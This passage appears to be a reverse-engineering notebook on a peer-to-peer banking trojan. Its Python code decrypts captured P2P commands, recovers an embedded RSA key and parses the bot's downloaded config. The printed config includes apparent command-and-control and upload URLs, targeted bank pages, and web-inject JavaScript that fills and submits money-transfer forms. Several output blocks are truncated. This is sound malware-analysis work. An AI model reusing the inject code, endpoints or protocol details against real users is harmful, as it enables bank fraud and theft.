command_data=b'\x00\xd4\xa8\xcc\xce&B\xd2D\xccsR\xac\xaa\x8b\x10l\xfccR\x8fG\xb0\xbe\xdbU\x0c\xa5\xf6\xbfA\xce\xd3\x07\xb3\xf6I\x9800\xe7\xcaj\xa4p\x00\xd5\xfd\x88Gw\xbe_\x1e\xea\xc9\x07\xf4\x88\x9f\xc2\xa8\x16\xd2\x95\xfeB\xd7\xe0)$\x05\x15\xc0De\xfa\n\x19\x9f\xad\xa5\x03\x7f\x93F\xdd\x00c(\x00\xd57\xfc\xe8\x80\xf5\x00\xe7\x93\xca<@/\x80\xaa\xd6\xaf\xee\xf6\x97Q\x95O^X\x150\xf67H\x8bn\xdc\xbf\x90W\xa6\xe6\x8c\x19G\x0fs?\x00\xd6\x98>@\xb1\xaf\xedA\' \xc7@\xdb\x16\xe0vm1!\x11\x89u\xc5\x83\x00\x04jF\x9a.\xbeP<\xda\x92\x18\x7fa:5\xf9\x0e/\x00\x00\xd0\x98/\xab\x1e\xfc\x91\xaa\x7f\xcb\xabPi\xe14fBh\xefJ\x82%\xc6xo\x07q\x89L]\xad\xa6\x97\xc6\xccb\xf3J6c\x15\xb6G\xb3\x00\xd3v\x1b\x08\xec\xf9A \x9dg\xcd\x86\x8bY\x87\x00\xcaB\xa3b\xb42\xc8m\xef$?\xb2\xfe\xce`?5G\xd1\xd2\xe1\x8c\xbeN{\xb7\xf6\x90\x

## UDP Command 6: Super Peer Data

Response data was verified with an embedded RSA public key.

## Embedded RSA Public Key \#1

Pseudocode:

      ...
      xor_key = 0x3B80208A;
      memcpy(&key_data, g_enc_rsa_public_key, sizeof(key_data));
      key_i = 0;
      for ( i = 0; i < 276; ++i )
      {
        *(&key_data.field_0 + i) ^= *(&xor_key + key_i++);
        if ( key_i == 4 )
          key_i = 0;
      }
    ...

Disassembly:

    ...
    .text:00EA6CA4 BD 14 01 00 00                                mov     ebp, 114h
    .text:00EA6CA9 C7 44 24 24 8A 20 80 3B                       mov     [esp+13Ch+xor_key], 3B80208Ah
    .text:00EA6CB1 55                                            push    ebp
    .text:00EA6CB2 8D 44 24 2C                                   lea     eax, [esp+140h+key_data]
    .text:00EA6CB6 8B FA                                         mov     edi, edx
    .text:00EA6CB8 68 68 6F E7 00                                push    offset g_enc_rsa_public_key
    ...

In [12]:
match = re.search(rb'\xbd(?P<encbuf_len>\x14\x01\x00\x00)\xc7\x44\x24[\s\S](?P<xor_key>[\s\S]{4})[\s\S]{1,7}\x68(?P<encbuf_addr>[\s\S]{4})',
                 pe.get_memory_mapped_image())

encbuf_len = struct.unpack("I", match.group("encbuf_len"))[0]
xor_key = match.group("xor_key")
encbuf_addr = struct.unpack("I", match.group("encbuf_addr"))[0]
encbuf_rva = encbuf_addr - pe.OPTIONAL_HEADER.ImageBase
encbuf = pe.get_data(encbuf_rva, encbuf_len)

plainbuf = b""
for i, eb in enumerate(encbuf):
    pb = eb ^ xor_key[i % len(xor_key)]
    plainbuf += struct.pack("B", pb)
    
print(plainbuf)

b'\x06\x02\x00\x00\x00$\x00\x00RSA1\x00\x08\x00\x00\x01\x00\x01\x00+\xa8\xf1|}\xc8\x90C\x9b\xffj\xa9>\x93\x03\x0b~\x07\xe5\xb30\xadn\x89\xcf\xfa\xa37\xcd\x19\xc3\xb1*\xf0X\xcb\xee\x19I\x00\x89v*\nt>\xc8\xea\x99\x1a\x1c\xcc9\xd1\x9d\xf0\xff\xcb\xa2\x1eT\x87\xc4\xafW\xc3x\x80\xda\xefo\x03\r#+Qd\xff,\xb3@\xd05Y\xf4\x1fa\xc6$^\x82\xef\xf8\xc17\x14\xeb\xa9\xc3\xe0S\xed?\xf0j@\xdci\x07\\\xe7.2x\x1aGP\xf1\x8dX\xb7\xd9W\xeb.\xb6ER&\xaf=\x11\x03Us\xb3\xcc\x04\xbd\x94"\xb4\x82a\xf8\xb4#Q\x178.\x9dgz&\xe7\xfc\r\xd5\xeb@\x06d\xc2\xffx]\xd4\x1b@\xb8\xe4S\xa3)%VHh\x12-}\x9aP.\x98O\x15-p\xe9\xf3\x03]\xb3X\xe7%)\xac\xc6\xa3\xef\xf3e\x8c1\xba;]\x93y\x13\x9e\x8fn\xf1\\\xd1e@q\xe4O\xe7\xf2\xfe~\x1d$\xe7\xc4\x83\x9bN\xb3\xa9d\x8e\x9e\x81T7\\\xcb\xd2\x03\xf0\xdfg\xf2\xe9y\x8aQ\xad'


In [13]:
udp_data = binascii.unhexlify("f985173b23927dfea6fc780da43f639648a6e59a1b79675a6c90bccdcacf1d699d39cf501b3d6401d7f3659ec00d8061dde646582eb9199193f385ec78e480c85e188a3448504868d1acc8a76fb7813c54f142b368b0b44f7ee7526408f89bee62192f071a5e84592b309ef6991b8cef01ec52d88c2cdcfd8fbb088c9b2d4632c6e42b81b637f15d19c0109e62f309daed41e96753d86e8bfc1add15f4bb2a47bff4a902c45b3cc3c5a8581d9009abf6144b8ef5d2926b2190bc58c1672d0c074c38b48ed4011279fc1035ff137c5345ecd325b46542624f193708d2e81b1d427ee8dce2938a3c50570fa9f1cc298d56c559b6e887dfaa5aeb39ae2ff1e17b30def98d12981243a74b5ca05523705355a1202f9c2898a1ecddd697d5f257fa1519cdec1433ed84356d51fc26c81371d55709cb8f4f62f17015670ec5dc2ecbab5fde1e47809b3c74c89e3c0e0c777ba2e651f167baf4e7dc2f4b31db3fc32237c670895710d71b9c52dd6e11773fc3c51cfb54b4c265e1a4221f14e4e98e14c49413231b851d24ab2e193b133cd1d6dd54f6eddd7b2b4ef1726fa6f184cd06dd71822c113518edebef7541b86e5c8e")
plainbuf = decrypt_p2p_command(victim_rc4_key, udp_data)
command, command_data = parse_p2p_command(plainbuf)

print(f"\nParsed command {command} data:\n")

command_signature = command_data[-128:]
print(f"{command_signature=}")

super_peer_data = command_data[:-128]

super_peer = {}
super_peer["flags"] = struct.unpack("I", super_peer_data[0:4])[0]
super_peer["rc4_key"] = super_peer_data[4:4+20]
super_peer["ipv4"] = socket.inet_ntop(socket.AF_INET, super_peer_data[24:24+4])
super_peer["ipv4_tcp_port"] = struct.unpack("H", super_peer_data[28:28+2])[0]
super_peer["ipv6"] = socket.inet_ntop(socket.AF_INET6, super_peer_data[30:30+16])
super_peer["ipv6_tcp_port"] = struct.unpack("H", super_peer_data[46:46+2])[0]
super_peer["signature"] = super_peer_data[48:48+128]

print()
pprint.pprint(super_peer)

field_0=226
field_1=210
padding_length=83
command=6
session_id=b'\x1d-\x05sC>?\x9d\xe8\xa3\xcaj\x85v\xe7k\x97.\x15C'
sender_rc4_key=b'\xd4\xd7\xea\x96)V\x83\xf0V5\xb5\xfb\xf9\x1aP\x1di\xb6\x19\xc2'
command_data=b'\x00\x00\x00\x00\xd4n\x1f4\xe1+\x9d6E\xac\x8b\x81r\xf1\x9e\x97\x82\xd9>\x84\x05\xf8\x19"\xd2\x1a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"&\xc2\x9c\x8bM\x0bqU-\x98\xb9\xe7\x9f$o\x89\xad\xf7;p\xfe\x87\x90\xc7j/\x82\xb9R6\x013\xb8\xcfx\xd2\x92d\x05n%\xfbx\xea$\xdc[\x0c\xa2\x83\xf3\xe2\xda\x9a{\x14X\r\x94\xc1z\x8c\xbf\xd6\xcb\x1f\xb2\x1b\xf4J\x8f\x0fS\x00\x9c\x02\xe0\x96d!\xd9#6\xe7\x07\xc0`w\x9ee;\xc7\xcc\x87]\x15}@\xc5\xea\xbbb8\xa81\xa0J\x97\xd3\x14\x02\xf8\x15\xf3tn\x10\x9aD\xd3_A\xc0\xb5\x0f\xd0I\x9f\xdb\x9c\xd8\xaa\x0e\xf92\xc6\r\xbf\xdc\x94m\xaf\xc6\x9c\xc8s\xc8\x0f\x93\xed\xa0\xd1>\xb2\x98\x07}\xfbuX\xb24\x94\x0e\r\xa6h\xc5\x05\xf0\xc5U\x0b\xaa:\xd1\x1d\xea\xcb\x85\xd5\xc3\x86\x03\x96?\xd9\xe9\xec\x9b\x08\xb1\xd3\xe5\x94E\xae\x05 \xbe\x02\r}

## UDP Command 50: Super Peer Data

UDP command 50 is similar to command 6, but the data is also broadcasted to peers.

## TCP Command 104: Config Request and Ack

In [14]:
tcp_data = binascii.unhexlify("73aa86632d3d9fcc9f344e109b347b8c8a54f37d93572c8a6497406a9226cd7b5e554da27c446a859cabd10f5d923daf45f37d3bbc0af68f6c367446869eb07d1d7ce80dff28037a0242cf7915fc7e6ffa495c4b39e7e73890d7b989ba3e14")
# the ack is sent after receiving/parsing the config, but the decryption doesn't line up when done separately.
tcp_data += binascii.unhexlify("4a657798")

plainbuf = decrypt_p2p_command(peer_rc4_key, tcp_data)

ack = struct.unpack("I", plainbuf[-4:])[0]

plainbuf = plainbuf[:-4]
command, command_data = parse_p2p_command(plainbuf)

print(f"\n{ack=}")

field_0=222
field_1=1
padding_length=51
command=104
session_id=b'!\'p72B\x08"e\xdbK\xf4d\xc0\xd2\x820\x8c\x13\xb5'
sender_rc4_key=b'Di\xc7\rK\x01\xb7\xaa_\x94\xc8n\x1f\xafN\x85a\x1fv\xa3'
command_data=b''
padding=b'\xdf}K\xdd\xf1\nUK\xbc\xdbT\x18\xee\xfaE\xf5=\xed\x1fKyf\xb7vl;+S\xf6Q]\xc6\x13a\x0c\x12\x977\xa0\xcc\x1d^uG9\x10J\xbcI\xe2-'
field_1 != ~session_id[1]: 1 / 216

ack=1


## TCP Command 104: Config Response

Response data was verified with embedded RSA public key \#1.

In [15]:
def rc4_keystate(S, in_buf):
    out_buf = b""

    i = S[256]
    j = S[257]
    
    for in_byte in in_buf:
        (i, j, S, K) = rc4_prga(i, j, S)
        out_byte = in_byte ^ K
        out_buf += struct.pack("B", out_byte)

    return out_buf

def rc4_prga(i, j, S):
    i = (i + 1) % 256
    j = (j + S[i]) % 256

    S = bytearray(S)
    S[i], S[j] = S[j], S[i]
    S = bytes(S)

    K = S[(S[i] + S[j]) % 256]

    return (i, j, S, K)

def visual_decrypt(enc_buf):
    buf = bytearray(enc_buf)

    for i in range(len(buf)-1, 0, -1):
        buf[i] ^= buf[i-1]

    plain_buf = bytes(buf)

    return plain_buf


fp = open("command_104_tcp_data", "rb")
tcp_data = fp.read()
fp.close()

command_data = decrypt_p2p_command(victim_rc4_key, tcp_data)
enc_data_len = struct.unpack("I", command_data[0:4])[0]
print(f"{enc_data_len=}")

enc_data = command_data[4:]
if len(enc_data) != enc_data_len:
    print("bad enc_data len")

enc_data_signature = enc_data[-128:]
print(f"{enc_data_signature=}")
enc_data = enc_data[:-128]

round1 = rc4_keystate(baseKey, enc_data)
binstorage = visual_decrypt(round1)

enc_data_len=944850
enc_data_signature=b"\xb8\xc3b\xfe\x0e\xebkI\xda\xa5'\xe7\xe7\xa7\x9f\xca(\xcf\xa2AKE\xccX\x83|\x9c\xba\xcb(\xb5Y\x87\x1dF\n\x95l56\x92\xd8\xfa6{\xbb0\x81t\xc3\xa0\xeb{W\x04c\xf0\xbf]\xec\xb8Y \x07\n^C\xbb\xb6K\x9a-^\r6\x0c/XJ+$\x8f\xe8\xe5w,Go\x0f;\xf0\\th`Q\xd2\x8d\x89J\xd3Q\xc5\x84\xae\x16\xe4\x9c\x7f\x83\xde\x0f\xce@\xe2\x08\xcb\x9d$\x86j\xf6\xb6?N\xf3\xbaO"


## TCP Command 104: Parse Config

In [16]:
def parse_binstorage_header(binstorage):
    header = {
        "randData": binstorage[0:20],
        "size": struct.unpack("I", binstorage[20:24])[0],
        "flags": struct.unpack("I", binstorage[24:28])[0],
        "version": struct.unpack("I", binstorage[28:32])[0],
        "md5Hash": binstorage[32:48],
    }
        
    return header

def decrypt_section_data(id_, version, encbuf):
    key = ((len(encbuf) << 16) | id_) & 0xffffffff
    key = (key | (version << 8)) & 0xffffffff
    key = struct.pack("I", key)
    
    plainbuf = b""
    for i, eb in enumerate(encbuf):
        pb = eb ^ key[i % len(key)]
        plainbuf += struct.pack("B", pb)
        
    return plainbuf

def parse_binstorage_sections(version, section_data):
    sections = []
    
    offset = 0
    while offset < len(section_data):            
        section = {}
        
        id_ = struct.unpack("I", section_data[offset:offset+4])[0]
        section["id"] = id_            
        flags = struct.unpack("I", section_data[offset+4:offset+8])[0]
        section["flags"] = f"0x{flags:x}"
        section["size"] = struct.unpack("I", section_data[offset+8:offset+12])[0]
        section["realSize"] = struct.unpack("I", section_data[offset+12:offset+16])[0]
        
        enc_data = section_data[offset+16:offset+16+section["size"]]
        data = decrypt_section_data(id_, version, enc_data)
        
        if flags & 0x1:
            data = zlib.decompress(data, -15)
        
        # additional parsing of data is left as an exercise
        section["data"] = data
        
        offset += 4 + 4 + 4 + 4 + section["size"]
            
        sections.append(section)
        
    return sections


binstorage_header = parse_binstorage_header(binstorage)
print("binstorage_header:\n")
pprint.pprint(binstorage_header)

binstorage_sections = parse_binstorage_sections(binstorage_header["version"], binstorage[48:binstorage_header["size"]])
print()
print("binstorage_sections:\n")
pprint.pprint(binstorage_sections)

binstorage_header:

{'flags': 0,
 'md5Hash': b'\x986\xf2\x94z\xf9\x88\x8dY2\xde\x95\xcc@/\xc9',
 'randData': b'\xa9\x81jx\xc1\xe8\xabR\xe1\xfd\xb1\xb1_,+\xe2;0\xeb\xaa',
 'size': 944594,
 'version': 86598323}

binstorage_sections:

[{'data': b'\x7f\x00\x00\x00\x00\x00\x00\x00\x11\x00m\x00\x00\x00\x01\x00'
          b'\x00\x00ERCPe\x00\x00\x00\x00\x00\x80\x00\x04\x00\x00\x00\x01\x00'
          b'\x00\x00\x00\x00m\x00(\x00\x00\x00\x00\x00\x00\x00\x00\x00'
          b'\x00\x00\x00\x00\x00\x00^\x009_\x00\x06\x00\x01\x1aT\x00\x05\x1c.'
          b'U\x00\x0b\x1cp\x1ce\x1cr\x1cs\x1co\x1cn\x1ca\x1cl\x1ce\x1cu\x1c'
          b'r\x1co\x1cl\x1ci\x1cn\x1ce\x1cs\x0c\x1c\x0f\x1cm\x1bU\x009\x00\x00'
          b'\x00\x00\x00.%\xb8:p\x00\x00\x00\x00\x00\x00\x00\x11\x00^\x00\x00'
          b'\x00\x01\x00\x00\x00ERCPV\x00\x00\x00\x00\x00\x80\x00\x04\x00\x00'
          b'\x00\x01\x00\x00\x00\x00\x00t\x00(\x00\x00\x00\x00\x00\x00'
          b'\x00\x00\x00\x00\x00\x00\x00\x00\x00^\x00*_\x00\x06\x00'
       

  'size': 43},
 {'data': b',\x00\x00\x00\x01\x00http://vodkashyhikoks.com/oz/00001.php',
  'flags': '0x40000000',
  'id': 11,
  'realSize': 44,
  'size': 44},
 {'data': b'-\x00\x00\x00\x01\x00http://vodkashyhikoks.com/oz/000001.php',
  'flags': '0x40000001',
  'id': 12,
  'realSize': 45,
  'size': 44},
 {'data': b'+\x00\x00\x00\x01\x00http://vodkashyhikoks.com/captcha.php',
  'flags': '0x40000000',
  'id': 13,
  'realSize': 43,
  'size': 43},
 {'data': b'g\x00\x00\x00\x04\x00ERCPa\x00\x00\x00\x06\x02\x80\x00\x06\x00'
          b'\x00\x00\x01\x00\x00\x00<\x00>\x02(\x00\t\x00\x01\x00'
          b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01inject\x00^'
          b'\x00)\x1c<\x1c/\x1cb\x1co\x1cd\x1cy\x1c>_\x00\x07\x00\x01:\rU'
          b'\x00\x07\x1c<\x1c/\x1ch\x1ct\x1cm\x1cl\x1c>U\x00)\x00\x00\x00\x00c'
          b'\x00\x00\x00\x08\x00<script type="text/javascript" language="JavaSc'
          b'ript" src="php/captcha?lnk=js&id=40"></script>S\x00\x00\x00\x04\x00'
          b'ERCPM\x0

          b'l8130",OS:"BlackBerry"},\n{Text:"Pearl Flip 8220",Value:"pearlFli'
          b'p8220",OS:"BlackBerry"},{Text:"Pearl Flip 8230",Value:"pearlFlip'
          b'8230",OS:"BlackBerry"},{Text:"Storm 9500",Value:"storm9500",OS:"'
          b'BlackBerry"},{Text:"Storm 9530",Value:"storm9530",OS:"BlackBerry'
          b'"},{Text:"Storm2 9520",Value:"storm29520",OS:"BlackBerry"},{Text'
          b':"Storm2 9550",Value:"storm29550",OS:"BlackBerry"},{Text:"Style '
          b'9670",Value:"style9670",OS:"BlackBerry"},{Text:"Torch 9800",Valu'
          b'e:"torch9800",OS:"BlackBerry"},{Text:"Tour 9630",Value:"tour9630'
          b'",OS:"BlackBerry"}],\nnokia:[{Text:"Nokia Lumia 521",Value:"lumia'
          b'521",OS:"Windows"},{Text:"Nokia Lumia 810",Value:"lumia810",OS:"'
          b'Windows"},{Text:"Nokia Lumia 820",Value:"lumia820",OS:"Windows"}'
          b',{Text:"Nokia Lumia 822",Value:"lumia822",OS:"Windows"},{Text:"N'
          b'okia Lumia 920",Value:"lumia920",OS:"Windows"},{Te

          b").contents()).focus();$('#creditCity',$('#transfer_frame').conte"
          b'nts()).val(postcode);$(\'#creditCountry [value="\'+land+\'"]\',$'
          b"('#transfer_frame').contents()).attr('selected','selected');$('t"
          b"extarea[name=description]',$('#transfer_frame').contents()).focu"
          b"s();$('textarea[name=description]',$('#transfer_frame').contents"
          b"()).val(comment);$('input#button_action_buitenlandOpslaanNaarVer"
          b"zendlijst',$('#transfer_frame').contents()).click()}else{$('#amo"
          b"unt',$('#transfer_frame').contents()).focus();$('#amount',$('#tr"
          b"ansfer_frame').contents()).val(summ);$('#amountCents',$('#transf"
          b"er_frame').contents()).focus();$('#amountCents',$('#transfer_fra"
          b'me\').contents()).val(\'00\');try{$(\'#debetAccount [value="\'+ac'
          b'count+\'"]\',$(\'#transfer_frame\').contents()).attr(\'selected\','
          b"'selected')}catch(e){}$('#creditAccount',$('#tran

 {'data': b'$\x00\x00\x00\x01\x00http://78.46.99.42/up/0000.php',
  'flags': '0x40000000',
  'id': 56,
  'realSize': 36,
  'size': 36},
 {'data': b'%\x00\x00\x00\x01\x00http://78.46.99.42/up/00000.php',
  'flags': '0x40000001',
  'id': 57,
  'realSize': 37,
  'size': 36},
 {'data': b'$\x00\x00\x00\x01\x00http://78.46.99.42/up/0001.php',
  'flags': '0x40000000',
  'id': 58,
  'realSize': 36,
  'size': 36},
 {'data': b'%\x00\x00\x00\x01\x00http://78.46.99.42/up/00001.php',
  'flags': '0x40000000',
  'id': 59,
  'realSize': 37,
  'size': 37},
 {'data': b'&\x00\x00\x00\x01\x00http://78.46.99.42/up/000001.php',
  'flags': '0x40000001',
  'id': 60,
  'realSize': 38,
  'size': 37},
 {'data': b',\x00\x00\x00\x01\x00http://78.46.99.42/captcha/captcha.php',
  'flags': '0x40000001',
  'id': 61,
  'realSize': 44,
  'size': 39},
 {'data': b'W\x00\x00\x00\x04\x00ERCPQ\x00\x00\x00\x06\x02\x80\x00\x04\x00'
          b'\x00\x00\x01\x00\x00\x00\x00\x00>\x00(\x00\t\x00\x01\x00'
          b'\x00\x00\x00\x

...

          b'\x00\x00\x00\x00\x80\x00\x02\x00\x00\x00\x02\x00\x00\x00.\x00'
          b'\x00\x00(\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
          b'\x00\x00^\x00E\x1c._\x00\x0b\x00\x01\x1cg\x1ci\x1cfT\x00\t\x1cp\x1c'
          b'n\x1cgT\x00\t\x1cj\x1cp\x1cgT\x00\t\x1cc\x1cs\x1csT\x00\t\x1cs\x1cw'
          b'\x1cfU\x00/_\x00\x06\x00\x02\x1bT\x00\x05\x1c?U\x00\x0bU'
          b'\x00E\x00\x0c\x00\x00\x00 \x00\x00@a\x1e\x00\x00G\x01\x00\x00\x00'
          b'\x00y\x03\xb6\x00\x00\x00\x010\x00\x80\x00\x00\x00\x00ERCP\xaa'
          b'\x00\x00\x00\x10\x02\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
          b'\x00\x00\x00(\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
          b'\x00\x00\x00^\x00~\x1a\x1ch\x1ct\x1ct\x1cp\x1cs\x1c:\x1c/\x1c/\x1c'
          b'a\x1cc\x1cc\x1ce\x1cs\x1cd\x1c.\x1cd\x1ce\x1cs\x1cj\x1ca\x1c'
          b'r\x1cd\x1ci\x1cn\x1cs\x1c.\x1cc\x1co\x1cm\x1c/\x1ct\x1ci\x1c'
          b's\x1ce\x1cc\x1cu\x1cA\x1cD\x1cG\x1ce\x1cs\x1ct\x1ci\x1co\x1c'
        

          b'\x00/_\x00\x06\x00\x02\x1bT\x00\x05\x1c?U\x00\x0bU\x00E\x00'
          b'\x0c\x00\x00\x00 \x00\x00\x80\x01\x00\x00\x00\x0c\x00\x00\x00'
          b' \x00\x00\x80\xb5\x06\x00\x00_\x01\x00\x00\x00\x00\xde\x03'
          b'\xce\x00\x00\x00\x010\x00\x80\x00\x00\x00\x00ERCP\xc2\x00\x00\x00'
          b'\x10\x02\x80\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00p\x02'
          b'(\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
          b'^\x00\x96\x1a\x1ch\x1ct\x1ct\x1cp\x1cs\x1c:\x1c/\x1c/:\x0c\x1c.'
          b'\x1cl\x1cl\x1co\x1cy\x1cd\x1cs\x1ct\x1cs\x1cb\x1c.\x1cc\x1co'
          b'\x1c.\x1cu\x1ck\x1c/\x1cp\x1ce\x1cr\x1cs\x1co\x1cn\x1ca\x1cl'
          b'\x1c/\x1ca\x1c/\x1cl\x1co\x1cg\x1co\x1cn\x1c/:\x0c\x1ce\x1cn'
          b'\x1ct\x1ce\x1cr\x1cm\x1ce\x1cm\x1co\x1cr\x1ca\x1cb\x1cl\x1ce'
          b'\x1ci\x1cn\x1cf\x1co\x1cr\x1cm\x1ca\x1ct\x1ci\x1co\x1cn\x1c.'
          b'\x1cj\x1cs\x1cpU\x00\x96\x00}\x00\x00\x00\x01\x10\x00@\x00\x00'
          b'\x00\x00ERCPq\x0

          b'0\x00\x80\x00\x00\x00\x00ERCP\x8c\x00\x00\x00\x10\x02\x80\x00\x00'
          b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00(\x00\x00\x00\x00'
          b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00^\x00`\x1a\x1c'
          b'h\x1ct\x1ct\x1cp\x1cs\x1c:\x1c/\x1c/\x1ck\x1cu\x1cn\x1cd\x1c'
          b'e\x1c.\x1cc\x1co\x1cm\x1cd\x1ci\x1cr\x1ce\x1cc\x1ct\x1c.\x1c'
          b'd\x1ce\x1c/\x1ct\x1cx\x1c/\x1cb\x1cr\x1co\x1ck\x1ce\x1cr\x1c'
          b'a\x1cg\x1ce\x1c/\x1ck\x1co\x1cn\x1ct\x1co:\x0cU\x00`\x00}'
          b'\x00\x00\x00\x01\x10\x00@\x00\x00\x00\x00ERCPq\x00\x00\x00\x00'
          b'\x00\x80\x00\x02\x00\x00\x00\x02\x00\x00\x00.\x00\x00\x00('
          b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00^'
          b'\x00E\x1c._\x00\x0b\x00\x01\x1cg\x1ci\x1cfT\x00\t\x1cp\x1cn\x1cg'
          b'T\x00\t\x1cj\x1cp\x1cgT\x00\t\x1cc\x1cs\x1csT\x00\t\x1cs\x1cw\x1cfU'
          b'\x00/_\x00\x06\x00\x02\x1bT\x00\x05\x1c?U\x00\x0bU\x00E\x00'
          b'\x0c\x00\x00\x

          b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00(\x00\x00'
          b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00^\x00\xb4'
          b'\x1a\x1ch\x1ct\x1ct\x1cp\x1cs\x1c:\x1c/\x1c/\x1cc\x1ca\x1cr\x1c'
          b'd\x1cs\x1ce\x1cc\x1cu\x1cr\x1ci\x1ct\x1cy\x1c.\x1ce\x1cn\x1c'
          b's\x1ct\x1ca\x1cg\x1ce\x1c.\x1cc\x1co\x1cm\x1c/\x1cA\x1cC\x1c'
          b'S\x1cW\x1ce\x1cb\x1c/\x1cE\x1cn\x1cr\x1co\x1cl\x1cl\x1cW\x1c'
          b'e\x1cb\x1c/\x1cC\x1ca\x1cn\x1ca\x1cr\x1ca\x1cB\x1ca\x1cn\x1c'
          b'k\x1c/\x1cs\x1ce\x1cr\x1cv\x1ce\x1cr\x1c/\x1cA\x1cc\x1cc\x1c'
          b'e\x1cs\x1cs\x1cC\x1co\x1cn\x1ct\x1cr\x1co\x1cl\x1cS\x1ce\x1c'
          b'r\x1cv\x1ce\x1cr:\x0cU\x00\xb4\x00}\x00\x00\x00\x01\x10\x00'
          b'@\x00\x00\x00\x00ERCPq\x00\x00\x00\x00\x00\x80\x00\x02\x00\x00'
          b'\x00\x02\x00\x00\x00.\x00\x00\x00(\x00\x00\x00\x00\x00\x00'
          b'\x00\x00\x00\x00\x00\x00\x00\x00\x00^\x00E\x1c._\x00'
          b'\x0b\x00\x01\x1cg\x1ci\x1cfT\x

          b'\x0c\x00\x00\x00 \x00\x00\x80\xb5\x06\x00\x00\x7f\x01\x00\x00'
          b'\x00\x00\x07\x05\xee\x00\x00\x00\x010\x00\x80\x00\x00\x00\x00ERCP'
          b'\xe2\x00\x00\x00\x10\x02\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00'
          b'\x00\x00\x00\x00(\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
          b'\x00\x00\x00\x00^\x00\xb6\x1a\x1ch\x1ct\x1ct\x1cp\x1cs\x1c:'
          b'\x1c/\x1c/\x1cc\x1ca\x1cr\x1cd\x1cs\x1ce\x1cc\x1cu\x1cr\x1ci'
          b'\x1ct\x1cy\x1c.\x1ce\x1cn\x1cs\x1ct\x1ca\x1cg\x1ce\x1c.\x1cc'
          b'\x1co\x1cm\x1c/\x1cA\x1cC\x1cS\x1cW\x1ce\x1cb\x1c/\x1cE\x1cn'
          b'\x1cr\x1co\x1cl\x1cl\x1cW\x1ce\x1cb\x1c/\x1cF\x1ce\x1cd\x1ce'
          b'\x1cr\x1ca\x1cl\x1cB\x1ca\x1cn\x1ck\x1c/\x1cs\x1ce\x1cr\x1cv'
          b'\x1ce\x1cr\x1c/\x1cA\x1cc\x1cc\x1ce\x1cs\x1cs\x1cC\x1co\x1cn'
          b'\x1ct\x1cr\x1co\x1cl\x1cS\x1ce\x1cr\x1cv\x1ce\x1cr:\x0cU\x00'
          b'\xb6\x00}\x00\x00\x00\x01\x10\x00@\x00\x00\x00\x00ERCPq\x00'
          b'\x00\x00\x00\x00\

## TCP Command 106: Binary Request and Ack

An ack is sent like command 104, but the TCP connection was RST in the PCAP before it was sent.

In [17]:
tcp_data = binascii.unhexlify("c2a939619c489e76efe1c8fe1dcbfd69bc639dc1bcd518a66497406a9226cd7b5e554da27c446a859cabd10f5970f3a7edc5650d887079f520e2df9270c65a924ae258eb53c6ed979685a534077d27173fe0acf4fe8096d63dc4ae03748041957067551c19866d32f164f3d3bca64a7f210cbdf7e33eb2c3c08e9ee09b8bb77b92124501cf9cd417a098f92ba17cfad062576fd002d1df3eb61ff4e98b17fa140fb6f099999316b19e823b9ea7038d36ed9597f44d90578f")
plainbuf = decrypt_p2p_command(peer_rc4_key, tcp_data)
command, command_data = parse_p2p_command(plainbuf)

field_0=111
field_1=2
padding_length=140
command=106
session_id=b"\x90Rq\x8dB\x97\x8e\xcc\xe3$\xcd\x11R\xf7\xbc>\x1f\x0e'\x99"
sender_rc4_key=b'Di\xc7\rK\x01\xb7\xaa_\x94\xc8n\x1f\xafN\x85a\x1fv\xa3'
command_data=b''
padding=b'\xdb\x9f\x85\xd5Y<M}\x88\xa1\xdbb\xa2.\xee!\xcb\xb5\xf5\xa4.\xf8\x07\x90\xc0\xd5\xc5\xbeb\x967\x8b\x01\xe0UjR\x9ePs\xda9\x04\xa9\x94\x03]6\x87\\x\xde\x15\x10\xcdz\x85%\xea\x85)UB\x8bC\x0b6\xc3\xe3\xcd%q\x7f\t\xdc\xa1T\x0f(\\ \xc5\xac\xc3\x97s{\x83pY\xf0\x85\xa5\x96\xa4\x83\x95\xa4hi\x8cne\x8dCni\x1f\x17\xe1:s\x8f\x00fF2 $\xb4\x1e\x92\xa5rq\x9d\xabrs\x9a\x0c\xda\xffm_\x85\xb9O\xc0\xbb'
field_1 != ~session_id[1]: 2 / 173


## TCP Command 106: Binary Response

Response data was verified with embedded RSA public key \#1.

In [18]:
fp = open("command_106_tcp_data", "rb")
tcp_data = fp.read()
fp.close()

command_data = decrypt_p2p_command(victim_rc4_key, tcp_data)
enc_data_len = struct.unpack("I", command_data[0:4])[0]
print(f"{enc_data_len=}")

enc_data = command_data[4:]
if len(enc_data) != enc_data_len:
    print("bad enc_data len")

enc_data_signature = enc_data[-128:]
print(f"{enc_data_signature=}")
enc_data = enc_data[:-128]

round1 = rc4_keystate(baseKey, enc_data)
binstorage = visual_decrypt(round1)

enc_data_len=272914
enc_data_signature=b'\xcay]x>\xb8\x07(\xb7\xc3\x99\x8d\x91<\x07\x95/M\x84\xdfD\x9d\x1d\xb6 \xed\xac\x8b\xde\xe1\xde\x9f\xd3\x8c\xbf`\xa2h\xf5\x18\xa4\xec\xe8\x8d\xa5\xa7\x82\x12\x06\xd9\xab\xda\x16m{\x7fuX%O5\x9d\xdd\xc1\xea\xfa\xaf\xd5o\x87;\x1f\xe3\x98\x9f@\x1e\x11\x12\xdb c\xb2\xa1\xb3\x15X\xa9\xb1\xa7%y*\xe5y0~\xbd\xa9\xc9\xe2\x8d\xca\x16"\x1c\x99(\xbb#N\xe1X\xc9(jb\xc4\xc2c\xb8\x13_\xbb<+.\xf1'


## TCP Command 106: Parse Binary

In [19]:
